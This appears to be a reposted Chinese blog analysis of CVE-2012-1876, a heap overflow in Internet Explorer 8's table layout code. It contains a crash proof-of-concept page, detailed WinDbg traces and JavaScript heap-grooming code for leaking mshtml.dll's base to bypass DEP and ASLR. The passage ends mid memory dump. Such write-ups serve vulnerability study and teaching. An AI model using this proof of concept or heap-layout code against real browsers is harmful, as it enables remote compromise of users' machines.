當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CVE-2012-1876 Internet Exporter堆溢出漏洞分析

發(fā)布時間：2025/3/21 编程问答 19 豆豆

生活随笔收集整理的這篇文章主要介紹了 CVE-2012-1876 Internet Exporter堆溢出漏洞分析小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

文章目錄

- 漏洞描述
- IE瀏覽器組件介紹
- 分析環(huán)境
- POC
- 漏洞分析
- 漏洞利用
- 參考資料

漏洞描述

該IE瀏覽器漏洞的成因在mshtml.dll這個模塊的CTableLayout::CalculateMinMax函數(shù)里，程序在執(zhí)行時會以HTML代碼中的元素span屬性作為循環(huán)控制次數(shù)向堆中寫入數(shù)據(jù)。如果此span值設(shè)置不當(dāng)，那么就會引發(fā)堆溢出問題。

IE瀏覽器組件介紹

Internet Explorer體系結(jié)構(gòu)的關(guān)鍵是使用組件對象模型(COM)，它控制所有的組件的交互，并實(shí)現(xiàn)組件的重用和擴(kuò)展性。下圖說明了Internet Explorer的主要組件。

IExplore.exe位于頂層，是IExplore.exe的可執(zhí)行文件，依賴于Internet Explorer的其他組件來完成渲染導(dǎo)航協(xié)議實(shí)現(xiàn)等工作
Browseui.dll提供Internet Explorer的用戶界面，此dll包括Internet Explorer地址欄狀態(tài)欄菜單欄等
Shdocvw.dll提供導(dǎo)航和歷史等功能，此dll公開ActiveX控件接口
Mshtml.dll是Internet Explorer的核心，它負(fù)責(zé)HTML和CSS解析
Urlmon.dll提供MIME處理和代碼下載功能
WinInet.dll是Windows Internet協(xié)議處理程序。它實(shí)現(xiàn)了HTTP和FTP協(xié)議及緩存管理

分析環(huán)境

環(huán)境版本

虛擬機(jī)	Win7 x86
IE瀏覽器	8.0
調(diào)試器	windbg

POC

<html> <body><table style="table-layout:fixed" ><col id="132" width="41" span="6" >&nbsp </col></table><script>function over_trigger() {var obj_col = document.getElementById("132");obj_col.width = "42765";obj_col.span = 666;}setTimeout("over_trigger();",1);</script> </body> </html>

上述代碼的功能比較清晰，最開始創(chuàng)建時span屬性值為6，而后通過js中的over_trigger函數(shù)將其動態(tài)更新為666(這個值可以是任意的只要能保證溢出就行)

漏洞分析

將poc保存為html文件并雙擊打開，會彈出阻止提示，此時用windbg附加IE進(jìn)程

附加列表中會有兩個IE進(jìn)程，選擇后一個，即當(dāng)前選項(xiàng)卡對應(yīng)的子進(jìn)程，接著我們設(shè)置如下幾個斷點(diǎn)

0:012> bp mshtml!CTableLayout::CalculateMinMax 0:012> bp mshtml!_HeapRealloc 0:012> bp mshtml!CTableCol::GetAAspan

漏洞成因是在CTableLayout::CalculateMinMax這個函數(shù)中，所以這個地方肯定要下個斷點(diǎn)，又因?yàn)槭嵌岩绯?#xff0c;所以在_HeapRealloc函數(shù)也來個斷點(diǎn)。最后CTableCol::GetAAspan函數(shù)是用來獲取Span屬性值的。

0:012> bd 1 2 0:012> bl0 e 6bcca078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 d 6bd7d7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 d 6bc4a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan

接著我們暫時禁用掉1和2兩個斷點(diǎn)，輸入g命令運(yùn)行，在IE中允許阻止的內(nèi)容，彈出警告直接點(diǎn)擊確定

0:012> g ModLoad: 6bb30000 6bbe2000 C:\Windows\System32\jscript.dll Breakpoint 0 hit eax=ffffffff ebx=004899c0 ecx=00412802 edx=ffffffff esi=00000000 edi=0245c334 eip=6891a078 esp=0245c0d8 ebp=0245c2f0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTableLayout::CalculateMinMax: 6891a078 8bff mov edi,edi

回到windbg可以看到程序第一次在CTableLayout::CalculateMinMax函數(shù)入口斷了下來，這是處理最開始創(chuàng)建時span值為6的情況

0:005> kb ChildEBP RetAddr Args to Child 0245c0d4 6891a6b8 004899c0 0245c368 00000000 mshtml!CTableLayout::CalculateMinMax 0245c2f0 68910879 0245c368 0245c334 00000001 mshtml!CTableLayout::CalculateLayout+0x276 0245c49c 68a1566c 0245d3b8 0245c6c8 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720 0245c5d4 68a118f9 004899c0 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8 ......

接著查看調(diào)用堆棧和CTableLayout::CalculateMinMax函數(shù)聲明

void __thiscall CTableLayout::CalculateMinMax(CTableLayout *theTableLayoutObj, LPVOID lpUnknownStackBuffer);

我們主要關(guān)心CTableLayout *theTableLayoutObj這個變量，它是一個指針，由上面的kb命令可知其值為004899c0

接著查看一下004899c0的內(nèi)容，68819aa0為vftable的值，00000006為span屬性的值，最右邊的0為申請的堆空間的起始地址，目前還沒分配所以為NULL

接著啟用1和2號斷點(diǎn)

0:005> g Breakpoint 1 hit eax=00000000 ebx=00000000 ecx=000000a8 edx=00000000 esi=00489a5c edi=00489a50 eip=689cd7a5 esp=0245c00c ebp=0245c024 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!_HeapRealloc: 689cd7a5 8bff mov edi,edi

輸入g命令運(yùn)行，程序斷在mshtml!_HeapRealloc函數(shù)開頭。

程序申請了堆空間用于保存column的樣式信息，每個樣式信息占0x1C個字節(jié)，有多少個樣式信息由span屬性值來決定。

由于poc中span屬性值為6，因此這里申請的堆空間的大小為0x1C*6=0xA8，即_HeapRealloc函數(shù)斷下后ecx寄存器的值

0:005> gu eax=00000000 ebx=00000000 ecx=775a5dd3 edx=004b6657 esi=00489a5c edi=00489a50 eip=689e34e2 esp=0245c014 ebp=0245c024 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CImplAry::EnsureSizeWorker+0xa1: 689e34e2 8bd8 mov ebx,eax

接著執(zhí)行g(shù)u命令執(zhí)行到返回，_HeapRealloc函數(shù)執(zhí)行完成之后，再查看CTableLayout *theTableLayoutObj這個變量的值

0:005> dd 004899c0 L30 004899c0 68819960 00464528 00439648 689ce3b8 004899d0 00000001 00000000 0108080d ffffffff 004899e0 00000000 00000000 00000000 ffffffff 004899f0 00017700 0000b478 00000000 00000000 00489a00 00000000 00412802 00000000 00000000 00489a10 00000000 00000006 00000000 ffffffff 00489a20 00000000 ffffffff 6881a594 00000004 00489a30 00000004 00475ed8 6881a594 00000018 00489a40 00000006 004a3660 00000000 00000000 00489a50 6881a594 00000000 00000000 004b6658 00489a60 00000000 00000000 00000000 00000000 00489a70 00000000 00000000 00000000 00000000

發(fā)現(xiàn)此時原來堆空間的起始地址由NULL變成了004b6658了

0:005> g Breakpoint 2 hit eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88 eip=6889a6cb esp=0245c02c ebp=0245c0d4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTableCol::GetAAspan: 6889a6cb 8bff mov edi,edi 0:005> gu eax=00000006 ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88 eip=68aaf31f esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x3ac: 68aaf31f 3de8030000 cmp eax,3E8h

繼續(xù)運(yùn)行程序會在CTableCol::GetAAspan處斷下來，也就是獲取span值作為寫入樣式信息時循環(huán)的控制次數(shù)，函數(shù)結(jié)果保存在eax中，此時eax的值為6

0:005> ba w1 004b6658 0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 e 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 e 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 e 004b6658 w 1 0001 (0001) 0:**** 0:005> g Breakpoint 3 hit eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670 eip=68c40a49 esp=0245c014 ebp=0245c01c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTableColCalc::AdjustForCol+0x2f: 68c40a49 eb2a jmp mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)

再來看下程序向申請的堆空間寫入樣式信息的過程，我們在堆空間的起始地址下斷，接著輸入g命令運(yùn)行，斷點(diǎn)斷下。

從poc中可以看到此時對應(yīng)的width屬性值為41，004899c0處寫入的內(nèi)容就為width值41*100=0x00001004，也就是斷點(diǎn)斷下時候ebx的值。當(dāng)斷點(diǎn)斷下時0x1C個字節(jié)的信息都已寫入完成，我們再單步往下跟一下

0:005> p eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670 eip=68c40a75 esp=0245c014 ebp=0245c01c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTableColCalc::AdjustForCol+0x5b: 68c40a75 5f pop edi ...... 0:005> eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001 eip=68aaf47a esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTableLayout::CalculateMinMax+0x558: 68aaf47a ff45ec inc dword ptr [ebp-14h] ss:0023:0245c0c0=00000000 0:005> eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001 eip=68aaf47d esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x55b: 68aaf47d 8b45ec mov eax,dword ptr [ebp-14h] ss:0023:0245c0c0=00000001 0:005> eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001 eip=68aaf480 esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x55e: 68aaf480 8345dc1c add dword ptr [ebp-24h],1Ch ss:0023:0245c0b0=00000000 0:005> eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001 eip=68aaf484 esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x562: 68aaf484 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0245c0e4=00000006

可以看到出現(xiàn)了inc+cmp的組合，可以猜想這應(yīng)該就是控制堆空間寫入樣式信息的循環(huán)了。

這幾條匯編指令的意思就是[ebp-14h]的值每次增加1，即每次循環(huán)后遞增，[ebp-24h]對應(yīng)的值每次加0x1C，即每次加一個樣式信息的字節(jié)數(shù)，最后當(dāng)前的循環(huán)次數(shù)和[ebp+10h]對應(yīng)的值比較

0:005> dd [ebp+10h] L1 0245c0e4 00000006

[ebp+10h]是span的屬性值。接下來我們來看下通過js腳本動態(tài)更新span屬性值后，也就是span值變成666時程序第二次在CTableLayout::CalculateMinMax函數(shù)入口斷下后是個什么情形，理論上是要重新分配空間的，畢竟要多寫入660個樣式信息，而后再獲取此時span的值作為循環(huán)控制次數(shù)，最后才向堆空間寫入樣式信息。

我們來到程序此時斷下來的地方，順便看下之前確實(shí)是寫入了6個樣式信息

0:005> bd 1 2 3 0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 d 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 d 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 d 004b6658 w 1 0001 (0001) 0:**** 0:005> g Breakpoint 0 hit eax=ffffffff ebx=004899c0 ecx=00402c02 edx=ffffffff esi=00000000 edi=0245bb4c eip=6891a078 esp=0245b8f0 ebp=0245bb08 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTableLayout::CalculateMinMax: 6891a078 8bff mov edi,edi 0:005> kb L3 ChildEBP RetAddr Args to Child 0245b8ec 6891a6b8 004899c0 0245bb80 00000000 mshtml!CTableLayout::CalculateMinMax 0245bb08 68910879 0245bb80 0245bb4c 00000001 mshtml!CTableLayout::CalculateLayout+0x276 0245bcb4 68a1566c 0245d328 0245bee0 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720 0:005> dd 004899c0 L30 004899c0 68819960 00464528 00439648 689ce3b8 004899d0 00000001 00000000 010a081d 00002580 004899e0 00000000 00000000 0041da18 ffffffff 004899f0 00017700 0000b478 00000708 00000001 00489a00 00000000 00402c02 00000000 00000000 00489a10 00000000 00000006 ffffffff ffffffff 00489a20 ffffffff ffffffff 6881a594 00000004 00489a30 00000004 00475ed8 6881a594 00000018 00489a40 00000006 004a3660 00000000 00000000 00489a50 6881a594 00000018 00000006 004b6658 00489a60 00000000 00000000 00000000 00000000 00489a70 00000000 00000000 00000000 00000000

繼續(xù)往下應(yīng)該是要分配堆空間了，啟用_HeapRealloc斷點(diǎn)，g命令運(yùn)行

0:005> be 1 2 0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 e 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 e 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 d 004b6658 w 1 0001 (0001) 0:**** 0:005> g Breakpoint 2 hit eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88 eip=6889a6cb esp=0245b844 ebp=0245b8ec iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTableCol::GetAAspan: 6889a6cb 8bff mov edi,edi 0:005> gu eax=0000029a ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88 eip=68aaf31f esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x3ac: 68aaf31f 3de8030000 cmp eax,3E8h

但我們卻發(fā)現(xiàn)程序跳過了堆空間的分配過程，錯誤的認(rèn)為之前分配的空間已經(jīng)足夠而轉(zhuǎn)去直接獲取控制循環(huán)次數(shù)的span屬性值eax，CTableCol::GetAAspan函數(shù)執(zhí)行完時eax的值為0x29a，即十進(jìn)制的666

接下來和前面一樣是寫入樣式信息的過程，不過這次是對只能容納6個樣式信息的堆空間寫入了666個樣式信息，從而引發(fā)了堆溢出

0:005> be 3 0:005> bd 1 2 0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 d 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 d 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 e 004b6658 w 1 0001 (0001) 0:**** 0:005> g Breakpoint 3 hit eax=04141148 ebx=00414114 ecx=004b6670 edx=00004141 esi=004b6658 edi=004b6670 eip=68c40a49 esp=0245b82c ebp=0245b834 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTableColCalc::AdjustForCol+0x2f: 68c40a49 eb2a jmp mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)

我們啟用堆空間的斷點(diǎn)，讓斷點(diǎn)在堆空間寫入的時候斷下，接著一直單步

0:005> eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001 eip=68aaf47a esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CTableLayout::CalculateMinMax+0x558: 68aaf47a ff45ec inc dword ptr [ebp-14h] ss:0023:0245b8d8=00000000 0:005> eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001 eip=68aaf47d esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x55b: 68aaf47d 8b45ec mov eax,dword ptr [ebp-14h] ss:0023:0245b8d8=00000001 0:005> eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001 eip=68aaf480 esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x55e: 68aaf480 8345dc1c add dword ptr [ebp-24h],1Ch ss:0023:0245b8c8=00000000 0:005> eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001 eip=68aaf484 esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTableLayout::CalculateMinMax+0x562: 68aaf484 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0245b8fc=0000029a

接著查看ebp+10h的值

0:005> dd ebp+10h L1 0245b8fc 0000029a

可以看到ebp-0x10對應(yīng)此時span屬性值為0x29a，所以程序最終將會執(zhí)行666次循環(huán)，堆溢出發(fā)生后程序?qū)⒗^續(xù)運(yùn)行，從而造成內(nèi)存訪問違規(guī)，導(dǎo)致IE瀏覽器崩潰

總結(jié)：

程序根據(jù)span的屬性值申請堆空間

獲取span的屬性值并循環(huán)向堆空間寫入樣式信息

通過js腳本動態(tài)更新span屬性值

此時程序跳過分配堆空間的過程錯誤的認(rèn)為之前分配的空間已經(jīng)足夠轉(zhuǎn)而去直接獲取控制循環(huán)次數(shù)的span屬性值

向堆空間寫入樣式信息引發(fā)堆溢出導(dǎo)致瀏覽器崩潰

漏洞利用

要利用堆溢出漏洞，需要先確定溢出時用于覆蓋的內(nèi)容和位置。為了繞過DEP和ASLR的保護(hù)，VUPEN通過溢出漏洞覆蓋BSTR字符串長度的值，然后通過JavaScript讀取CButtonLayout虛表指針，通過固定偏移量找到mshtml.dll基址，用它來構(gòu)造ROP指令，以此繞過DEP和ASLR

為了繞過DEP和ASLR，首先需要構(gòu)造堆布局以便將mshtml.dll基址泄露出來，下面的代碼就是用于構(gòu)造堆布局的

<div id="test"></div><script language='javascript'>var leak_index = -1;var dap = "EEEE";while ( dap.length < 480 ) dap += dap;var padding = "AAAA";while ( padding.length < 480 ) padding += padding;var filler = "BBBB";while ( filler.length < 480 ) filler += filler;//sprayvar arr = new Array();var rra = new Array();var div_container = document.getElementById("test");div_container.style.cssText = "display:none";for (var i=0; i < 500; i+=2) {// Erra[i] = dap.substring(0, (0x100-6)/2);// S, bstr = Aarr[i] = padding.substring(0, (0x100-6)/2);// A, bstr = Barr[i+1] = filler.substring(0, (0x100-6)/2);// Bvar obj = document.createElement("button");div_container.appendChild(obj);}for (var i=200; i<500; i+=2 ) {rra[i] = null;CollectGarbage();}</script>

上面的JavaScript代碼首先創(chuàng)建0x100大小的字符串"EEEE"，接著是同等大小的"AAAA"和"BBBB"，最后又創(chuàng)建了一個button元素，即CButtonLayout對象結(jié)構(gòu)。

上面的字符串在IE瀏覽器中都是一段BSTR字符串，即Basic String的簡稱，它是包含長度前綴和NULL終止符的Unicode字符串，所以字符數(shù)是字節(jié)數(shù)的一半，這也是前面代碼分配字符串除以2的原因。

接著，再從rra數(shù)組中間位置開始間隔釋放內(nèi)存，騰出空間后供后面分配0x100大小的對象時能夠被占用到。

最后，構(gòu)造出來的堆空間布局如下：

[外鏈圖片轉(zhuǎn)存失敗(img-Jj8bWphb-1565927056165)(assets/1565860060218.png)]

釋放的位置就是為了在分配漏洞堆塊vulheap時能夠占用到這些釋放位置中的一個，當(dāng)溢出時就可以覆蓋到后面的AAAA和BBBB了。

接下來，創(chuàng)建一連串的col元素，共132個以占用前面釋放的"EEEE"位置

為了確定所分配的vulheap是否占用到已釋放的"EEEE"位置，我們先在釋放內(nèi)存的函數(shù)CollectGarbage上下斷點(diǎn)，它對應(yīng)的是jscript.dll中的JsCollectGarbage。

[外鏈圖片轉(zhuǎn)存失敗(img-snGZd9hA-1565927056166)(assets/1565921432705.png)]

先通過Windbg加載IE進(jìn)程

0:012> .childdbg 1 Processes created by the current process will be debugged

并執(zhí)行.childdbg開啟子進(jìn)程調(diào)試

0:012> sxe ld:jscript

因?yàn)閯傞_始IE還沒有加載jscript.dll，所以先設(shè)置加載jscript.dll時斷下

0:012> g ModLoad: 6be10000 6bec2000 C:\Windows\System32\jscript.dll eax=00000000 ebx=00000000 ecx=00000074 edx=004c0e94 esi=7ffd9000 edi=022ac19c eip=775970b4 esp=022ac0b4 ebp=022ac108 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!KiFastSystemCallRet: 775970b4 c3 ret

接著輸入g命令，點(diǎn)擊運(yùn)行阻止的風(fēng)險，此時程序斷在jscript.dll

0:005> bp jscript!JsCollectGarbage

斷下后再對JsCollectGarbage函數(shù)下斷。因?yàn)獒尫哦褖K最后都會調(diào)用到底層函數(shù)ntdll!RtlFreeHeap，所以它的第三個參數(shù)即為被釋放的堆地址，我們可以對其下斷，然后記錄并輸出每個釋放的堆塊地址。

0:005> bd 0 0:005> bl0 d 6be983d3 0001 (0001) 0:**** jscript!JsCollectGarbage0:005> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"

下斷前可以先把JsCollectGarbage斷點(diǎn)禁掉，避免程序多次被中斷

分配vulheap堆塊的行為是CTableLayout::CalculateMinMa中調(diào)用CImplAry::EnsureSizeWorker函數(shù)分配的，并且分配的地址保存在[ebx+9c]中，調(diào)用完CImplAry::EnsureSizeWorker函數(shù)的下一條指令位于mshtml!CTableLayout::CalculateMinMax+0x16d，可以如此下斷得到vulheap地址：

0:005> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"

由于日志輸出信息比較多，可以將日志保存在文檔中

0:005> .logopen c:\log.txt Opened log file 'c:\log.txt'

記錄完畢可以使用.logclose關(guān)閉

0:005> .logclose Closing open log file c:\log.txt

保存之后，最后一個vueheap就是我們要的’

free heap 083f2ef0 e8 d2 56 69 00 0d 4c 00-d0 62 83 04 38 04 4c 00 ..Vi..L..b..8.L. free heap 00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? free heap 00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? free heap 00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? (3f4.c0): Stack overflow - code c00000fd (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000009 ebx=083f5d20 ecx=00000000 edx=00000009 esi=022ac580 edi=00000000 eip=694ba1b2 esp=020b3000 ebp=022ac2ec iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!CTableLayout::CalculateMinMax+0x175: 694ba1b2 50 push eax

另外為了確定虛表偏移,直接動態(tài)找一下吧

0:005> x mshtml!CButtonLayout::* 6956f069 mshtml!CButtonLayout::GetThemeClassId (<no parameter info>) 695ee9c5 mshtml!CButtonLayout::GetInsets (<no parameter info>) 69508690 mshtml!CButtonLayout::`vftable' = <no type information> 6959cf35 mshtml!CButtonLayout::GetAutoSize (<no parameter info>) 69785a7c mshtml!CButtonLayout::HitTestContent (<no parameter info>) 6955d2e3 mshtml!CButtonLayout::DrawClientBackground (<no parameter info>) 69509211 mshtml!CButtonLayout::Init (<no parameter info>) 6959cf35 mshtml!CButtonLayout::GetMultiLine (<no parameter info>) 696f1080 mshtml!CButtonLayout::s_layoutdesc = <no type information> 69785a6c mshtml!CButtonLayout::GetBtnHelper (<no parameter info>) 697858a7 mshtml!CButtonLayout::GetFocusShape (<no parameter info>) 696f1079 mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>) 69785a07 mshtml!CButtonLayout::DoLayout (<no parameter info>) 6956f069 mshtml!CButtonLayout::GetWordWrap (<no parameter info>) 695084f8 mshtml!CButtonLayout::`vftable' = <no type information> 6955d2af mshtml!CButtonLayout::DrawClient (<no parameter info>) 695d36c1 mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>) 697856e7 mshtml!CButtonLayout::DrawClientBorder (<no parameter info>) 695d36c1 mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>) 695eeb59 mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)

奇怪的是，有兩個虛表，這里我也不知道為什么……

此外看一下vulheap

1:026> db 03f2ae30 l101c 03f2ae30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2ae40 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2ae50 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2ae60 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2ae70 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2ae80 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2ae90 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2aea0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2aeb0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2aec0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2aed0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2aee0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2aef0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2af00 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2af10 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2af20 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2af30 04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00 .........a...... 03f2af40 02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00 ....H........... 03f2af50 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A. 03f2af60 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2af70 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H... 03f2af80 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A. 03f2af90 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H....... 03f2afa0 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A. 03f2afb0 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H........... 03f2afc0 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A. 03f2afd0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2afe0 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H... 03f2aff0 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A. 03f2b000 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H....... 03f2b010 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A. 03f2b020 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H........... 03f2b030 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A. 03f2b040 48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2 H...A... ....... 03f2b050 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a.............. 03f2b060 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B. 03f2b070 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b080 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b090 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b0a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b0b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b0c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b0d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b0e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b0f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b100 42 00 42 00 42 00 42 00-42 00 42 00 